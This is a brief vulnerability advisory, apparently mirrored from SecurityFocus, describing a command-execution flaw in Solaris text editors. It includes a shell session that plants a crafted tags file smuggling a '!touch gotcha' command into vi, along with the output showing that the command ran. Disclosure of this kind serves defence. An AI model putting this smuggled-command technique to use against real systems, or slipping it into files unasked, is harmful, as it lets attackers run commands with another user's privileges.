17 lines
No EOL
456 B
Text
17 lines
No EOL
456 B
Text
source: https://www.securityfocus.com/bid/31229/info
|
|
|
|
Sun Solaris text editors are prone to a command-execution vulnerability.
|
|
|
|
An attacker may leverage this issue to execute arbitrary commands with the privileges of another user on the affected computer.
|
|
|
|
Sun Solaris 8, 9, and 10 are affected.
|
|
|
|
$ echo "This is line 1" > file1
|
|
$ echo "file1line1<TAB>file1<TAB>:1|!touch gotcha" > tags
|
|
$ ls
|
|
file1 tags
|
|
$ vi -t file1line1
|
|
:q!
|
|
$ ls
|
|
file1 gotcha tags
|
|
$ |